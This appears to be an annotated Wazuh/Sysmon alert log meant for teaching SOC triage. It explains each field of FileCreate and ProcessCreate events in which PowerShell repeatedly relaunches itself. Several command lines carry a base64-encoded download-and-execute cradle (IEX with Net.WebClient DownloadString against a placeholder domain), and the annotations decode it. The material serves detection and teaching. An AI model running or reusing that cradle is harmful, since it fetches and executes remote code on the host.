data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_sqqlcpdl.oin.ps1 Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in the user's %TEMP% is a known benign artifact: every Windows PowerShell start writes a throwaway script there to test whether AppLocker/WDAC script enforcement applies, then removes it. On its own it is not a dropped tool, so this alert really tells you that PowerShell was launched; pivot on processGuid to the ProcessCreate event and judge that.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:27.354 Creation timestamp of the file on disk. Equal to utcTime here, as expected for a brand-new file; if it were earlier than utcTime, an existing file was overwritten or its timestamp was tampered with.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as: a local account on the host named Attacker. The misspelling is in the username itself, not a parsing error.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline, but verify it: here the "dropped executable" is a .ps1 in %TEMP% that PowerShell itself writes at start-up (see targetFilename), so the headline overstates what happened.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). High-risk IDs like T1059, T1105, T1547 deserve fast triage, but they are the rule's static mapping, not evidence: T1105 here does not mean a network transfer was observed.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.872809 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that generated the event, here Sysmon. Tells you which event schema the IDs below belong to.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Microsoft-Windows-Sysmon. Stable across Sysmon versions, so a safe filter key.
data.win.system.eventID: 11 Event ID within the provider. For Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Different numbering from the Security log (4624, 4688), so always read it together with providerName.
data.win.system.version: 2 Schema version of the event. It differs per Event ID (FileCreate is v2, ProcessCreate v5 on this host) and bumps when Sysmon adds fields, so a parser must not assume a fixed field list.
data.win.system.level: 4 Windows event level (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose). Sysmon writes everything at 4, so it says nothing about how bad the event is; use the Wazuh rule level for that.
data.win.system.task: 11 Task category. For Sysmon the task number mirrors the Event ID (11 = FileCreate), unlike the Security log where it names a category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:32.4516011Z Time the event was written to the event log (UTC, ISO 8601). Expect it milliseconds to about a second after data.win.eventdata.utcTime, which is when Sysmon saw the action; a large gap means delayed logging or a clock problem.
data.win.system.eventRecordID: 281891 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process the event describes. It is the same 3712 on every Sysmon event from this host; the PID you care about is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that logged the event. Same caveat as processID: it is not the suspicious process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from. This is Sysmon's own log; open it on the host (Event Viewer, or Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational) to see the neighbouring events no rule fired on.
data.win.system.computer: Attacker Hostname Windows stamped on the event. It should match agent.name; if it does not, the agent is forwarding another machine's logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:32.449
ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ProcessId: 2732
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_okjzviqs.4g5.ps1
CreationUtcTime: 2025-04-24 22:35:32.449
User: Attacker\Attcker1" Full rendered text of the Sysmon event, as Event Viewer shows it. Every line in it is also available parsed under data.win.eventdata.*, so query those fields and use this one for reading.
data.win.eventdata.utcTime: 2025-04-24 22:35:32.449 Time Sysmon observed the file create (UTC). Use this, not systemTime, when building the timeline. It lands about a second after the ProcessCreate of PID 2732 in the next alert, which is the start-up sequence of that PowerShell.
data.win.eventdata.processGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} Sysmon's unique ID for the creating process, derived from the machine GUID and the process start time. PIDs are reused after exit, GUIDs are not: pivot on this to pull every event for exactly this process. The same GUID is the processGuid of the next ProcessCreate alert on this page.
data.win.eventdata.processId: 2732 Windows PID of the process that created the file. Good for matching within a short window; prefer processGuid for joins.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file, here the built-in Windows PowerShell 5.1 engine in its expected location.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_okjzviqs.4g5.ps1 Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in the user's %TEMP% is a known benign artifact: every Windows PowerShell start writes a throwaway script there to test whether AppLocker/WDAC script enforcement applies, then removes it. On its own it is not a dropped tool, so this alert really tells you that PowerShell was launched; the ProcessCreate alert for the same processGuid is where the judgement is made.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:32.449 Creation timestamp of the file on disk. Equal to utcTime here, as expected for a brand-new file; if it were earlier than utcTime, an existing file was overwritten or its timestamp was tampered with.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as: a local account on the host named Attacker. The misspelling is in the username itself, not a parsing error.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline. Here it is the strongest signal on the page: parent and child are both powershell.exe with the identical -EncodedCommand, one link in a chain of PowerShell relaunching itself.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.875573 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that generated the event, here Sysmon. Tells you which event schema the IDs below belong to.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Microsoft-Windows-Sysmon. Stable across Sysmon versions, so a safe filter key.
data.win.system.eventID: 1 Event ID within the provider. For Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Different numbering from the Security log (4624, 4688), so always read it together with providerName.
data.win.system.version: 5 Schema version of the event. It differs per Event ID (ProcessCreate is v5, FileCreate v2 on this host) and bumps when Sysmon adds fields, so a parser must not assume a fixed field list.
data.win.system.level: 4 Windows event level (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose). Sysmon writes everything at 4, so it says nothing about how bad the event is; use the Wazuh rule level for that.
data.win.system.task: 1 Task category. For Sysmon the task number mirrors the Event ID (1 = ProcessCreate), unlike the Security log where it names a category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:32.2957666Z Time the event was written to the event log (UTC, ISO 8601). Here it is about a second after data.win.eventdata.utcTime, which is when Sysmon saw the process start; a much larger gap means delayed logging or a clock problem.
data.win.system.eventRecordID: 281890 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process the event describes. It is the same 3712 on every Sysmon event from this host; the PID you care about is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that logged the event. Same caveat as processID: it is not the suspicious process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from. This is Sysmon's own log; open it on the host (Event Viewer, or Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational) to see the neighbouring events no rule fired on.
data.win.system.computer: Attacker Hostname Windows stamped on the event. It should match agent.name; if it does not, the agent is forwarding another machine's logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:31.218
ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ProcessId: 2732
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00}
ParentProcessId: 14564
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Full rendered text of the Sysmon event, as Event Viewer shows it. Every line in it is also available parsed under data.win.eventdata.*, so query those fields and use this one for reading.
data.win.eventdata.utcTime: 2025-04-24 22:35:31.218 Time Sysmon saw the process start (UTC). Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} Sysmon's unique ID for the new process, derived from the machine GUID and the process start time. PIDs are reused after exit, GUIDs are not: pivot on this to pull every event for exactly this process. This GUID is also the processGuid of the FileCreate alert above and the parentProcessGuid of the next ProcessCreate alert.
data.win.eventdata.processId: 2732 Windows PID of the new process. Good for matching within a short window; prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the new process's binary: the built-in Windows PowerShell 5.1 engine in its expected location. PowerShell running from anywhere else would be a bigger red flag.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE resource. 10.0.26100.x is the Windows 11 24H2 / Windows Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource. Anyone can set it in a custom binary, so it is a hint only; hashes is the check.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource. Same caveat: a hint, not proof.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource. Same caveat: a hint, not proof.
data.win.eventdata.originalFileName: PowerShell.EXE Original filename stored in the PE resource. Compare with image: if they differ, someone renamed the binary to dodge name-based rules. Here they match.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line of the new process. Two things to notice: the powershell.exe path appears twice, so PowerShell was handed another powershell.exe as its first argument, and the -EncodedCommand value is base64 of the script's UTF-16LE bytes. Decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle pointed at a placeholder domain. -NoLogo -NoProfile are typical for scripted launches.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process. The user's profile root is what an interactive launch gives you.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as: a local account on the host named Attacker. The misspelling is in the username itself, not a parsing error.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's ID for the logon session the process belongs to. Every process started in the same session shares it.
data.win.eventdata.logonId: 0x26584 Windows logon session ID, the same value the Security log calls Logon ID. Pivot on it to the session's 4624 event to learn how the user got in (console, RDP, network).
data.win.eventdata.terminalSessionId: 1 Windows session number. 0 is services; 1 is the first interactive desktop session (console or RDP), so a logged-on user ran this, not a service.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a normal non-elevated user; High would be an elevated (admin) prompt; System is a service. No elevation has happened at this point.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image on disk (which algorithms are logged depends on the Sysmon config; here SHA256). Check it against the known-good hash for this Windows build or a reputation service: the right path with an unknown hash means a replaced binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00} Sysmon GUID of the parent. Its own ProcessCreate event is not among the alerts on this page, so pull it by GUID to find where the chain starts.
data.win.eventdata.parentProcessId: 14564 PID of the parent. Reused after exit; join on parentProcessGuid instead.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Binary of the parent: another powershell.exe. PowerShell spawning PowerShell with an encoded command is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Command line of the parent, identical to the child's. Each process in this chain relaunches PowerShell with the same arguments; these events alone do not show why, so walk the chain and decode the script before deciding.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change at this hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline. This is the second consecutive hit of the same rule: the child of the previous alert (PID 2732) is now the parent, so the chain is growing by one PowerShell every couple of seconds.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.883639 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that generated the event, here Sysmon. Tells you which event schema the IDs below belong to.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Microsoft-Windows-Sysmon. Stable across Sysmon versions, so a safe filter key.
data.win.system.eventID: 1 Event ID within the provider. For Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Different numbering from the Security log (4624, 4688), so always read it together with providerName.
data.win.system.version: 5 Schema version of the event. It differs per Event ID (ProcessCreate is v5, FileCreate v2 on this host) and bumps when Sysmon adds fields, so a parser must not assume a fixed field list.
data.win.system.level: 4 Windows event level (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose). Sysmon writes everything at 4, so it says nothing about how bad the event is; use the Wazuh rule level for that.
data.win.system.task: 1 Task category. For Sysmon the task number mirrors the Event ID (1 = ProcessCreate), unlike the Security log where it names a category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:34.8231642Z Time the event was written to the event log (UTC, ISO 8601). Here it is about a second after data.win.eventdata.utcTime, which is when Sysmon saw the process start; a much larger gap means delayed logging or a clock problem.
data.win.system.eventRecordID: 282011 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process the event describes. It is the same 3712 on every Sysmon event from this host; the PID you care about is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that logged the event. Same caveat as processID: it is not the suspicious process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from. This is Sysmon's own log; open it on the host (Event Viewer, or Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational) to see the neighbouring events no rule fired on.
data.win.system.computer: Attacker Hostname Windows stamped on the event. It should match agent.name; if it does not, the agent is forwarding another machine's logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:33.635
ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ProcessId: 6588
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00}
ParentProcessId: 2732
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Full rendered text of the Sysmon event, as Event Viewer shows it. Every line in it is also available parsed under data.win.eventdata.*, so query those fields and use this one for reading.
data.win.eventdata.utcTime: 2025-04-24 22:35:33.635 Time Sysmon saw the process start (UTC). Use this, not systemTime, for the timeline: 2.4 seconds after the previous ProcessCreate, which is the cadence of this chain.
data.win.eventdata.processGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} Sysmon's unique ID for the new process, derived from the machine GUID and the process start time. PIDs are reused after exit, GUIDs are not: pivot on this to pull every event for exactly this process. This GUID reappears as the processGuid of the next FileCreate alert and as the parentProcessGuid of the ProcessCreate alert after that.
data.win.eventdata.processId: 6588 Windows PID of the new process. Good for matching within a short window; prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the new process's binary: the built-in Windows PowerShell 5.1 engine in its expected location. PowerShell running from anywhere else would be a bigger red flag.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE resource. 10.0.26100.x is the Windows 11 24H2 / Windows Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource. Anyone can set it in a custom binary, so it is a hint only; hashes is the check.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource. Same caveat: a hint, not proof.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource. Same caveat: a hint, not proof.
data.win.eventdata.originalFileName: PowerShell.EXE Original filename stored in the PE resource. Compare with image: if they differ, someone renamed the binary to dodge name-based rules. Here they match.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line of the new process, byte-for-byte the same as in the previous ProcessCreate alert. The -EncodedCommand value is base64 of the script's UTF-16LE bytes and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle pointed at a placeholder domain.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process. The user's profile root is what an interactive launch gives you.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as: a local account on the host named Attacker. The misspelling is in the username itself, not a parsing error.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's ID for the logon session the process belongs to. Unchanged from the previous alert, so the whole chain runs in one logon session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID, the same value the Security log calls Logon ID. Pivot on it to the session's 4624 event to learn how the user got in (console, RDP, network).
data.win.eventdata.terminalSessionId: 1 Windows session number. 0 is services; 1 is the first interactive desktop session (console or RDP), so a logged-on user ran this, not a service.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a normal non-elevated user; High would be an elevated (admin) prompt; System is a service. Still no elevation at this hop.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image on disk (which algorithms are logged depends on the Sysmon config; here SHA256). Same hash as the previous alert, so it is the same binary; verify it once against a known-good source and reuse the verdict.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} Sysmon GUID of the parent. It equals the processGuid of the previous ProcessCreate alert (PID 2732), so the two alerts are consecutive links in the chain.
data.win.eventdata.parentProcessId: 2732 PID of the parent. Reused after exit; join on parentProcessGuid instead.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Binary of the parent: another powershell.exe. PowerShell spawning PowerShell with an encoded command is what rule 92057 keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Command line of the parent, identical to the child's. Each process in this chain relaunches PowerShell with the same arguments; these events alone do not show why, so walk the chain and decode the script before deciding.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change at this hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline, but verify it: here the "dropped executable" is a .ps1 in %TEMP% that PowerShell itself writes at start-up (see targetFilename), so the headline overstates what happened.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). High-risk IDs like T1059, T1105, T1547 deserve fast triage, but they are the rule's static mapping, not evidence: T1105 here does not mean a network transfer was observed.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.891701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that generated the event, here Sysmon. Tells you which event schema the IDs below belong to.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Microsoft-Windows-Sysmon. Stable across Sysmon versions, so a safe filter key.
